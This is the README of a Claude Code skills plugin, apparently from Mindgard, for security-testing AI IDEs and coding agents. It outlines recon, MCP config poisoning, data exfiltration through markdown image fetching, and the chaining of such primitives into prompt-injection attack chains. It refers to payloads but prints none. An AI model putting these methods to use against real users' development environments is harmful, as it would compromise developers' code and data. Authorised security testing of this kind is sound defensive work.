AI IDE Vulnerability Skills
Claude Code skills plugin for security testing AI-assisted IDEs and coding agents. 8 skills covering 25 vulnerability patterns across 4 classes (code execution, prompt injection, data exfiltration, trust persistence), with 5 canonical attack chain templates. Supports both black-box assessment (documentation analysis, runtime observation, payload testing) and white-box assessment (source code auditing with semgrep/CodeQL queries, static analysis templates). Each skill includes step-by-step methodology, copy-pasteable payloads, and known vulnerability references.
Installation
Install from GitHub (permanent):
# Inside Claude Code:
/plugin marketplace add Mindgard/ai-ide-skills
/plugin install ai-ide-vuln-skills@mindgard
Local development -- clone and load for a single session:
git clone https://github.com/Mindgard/ai-ide-skills.git
claude --plugin-dir ./ai-ide-vuln-skills
Verify installation -- run /help to see all available skills. Skills are invoked by name (e.g., /ai-ide-recon).
How to Use
Each skill is a guided methodology. You invoke the skill, tell Claude what target you're testing, and it walks you through the steps — what to test, in what order, with payloads you can copy-paste. Skills are designed to be used in sequence: recon first, then pattern-specific skills, then chain construction.
Example: Black-Box Assessment
Testing a closed-source AI IDE you only have the binary and documentation for.
Step 1 — Recon. Map the attack surface:
/ai-ide-recon
> Assess the attack surface of [TargetIDE]. Documentation is at [URL].
Claude analyzes the docs, identifies security-relevant features (MCP support, command execution, workspace trust model, output rendering), detects blind spots, and produces a tier-annotated attack surface map. Tier 1 findings (auto-loading configs, no trust model) are flagged first.
Step 2 — Test highest-tier findings. Recon found MCP support with no documented trust model:
/mcp-config-poisoning
> Test whether [TargetIDE] auto-loads MCP configs from workspace files.
> Recon found the config path is .targetide/mcp.json.
Claude starts with the Tier 1 test (does the config load without approval?), then moves down through tiers.
Step 3 — Test additional findings. Recon found markdown rendering with images:
/ai-ide-data-exfil
> Test whether [TargetIDE] fetches external images in rendered markdown output.
Step 4 — Build chains. After confirming individual primitives:
/ai-ide-attack-chains
> Confirmed primitives: MCP auto-load (Tier 1), markdown image rendering (Tier 2).
> Build attack chains and assess severity.
Claude maps your confirmed primitives to canonical chains, constructs a PoC, and classifies severity by trigger model.
Example: White-Box Assessment
Testing an open-source AI IDE with full source code access.
Step 1 — Recon. Same as black-box — documentation analysis is faster than reading the entire codebase:
/ai-ide-recon
> Assess the attack surface of [TargetIDE]. Source is at [repo URL], docs at [URL].
Step 2 — Source audit. Focus on the six code areas that yield the most findings:
/ai-ide-source-audit
> Audit [TargetIDE] source code. Recon identified MCP support, command execution,
> and workspace config auto-loading. Start with Tier 1 targets.
Claude guides you through config auto-loading code, command execution pipeline, MCP integration layer — with grep patterns, semgrep rules, and CodeQL queries for each target.
Step 3 — Pattern skills + chains. Same as black-box steps 2-4, but informed by source findings.
Tips
- Keep the same conversation across skills — recon findings carry forward as context for pattern skills.
- Start from the target's project directory — some skills reference workspace files and config paths.
- Check
references/directories inside each skill for copy-pasteable payloads, config format templates, and known vulnerability tables. - Use
/helpto list all available skills if you forget a name.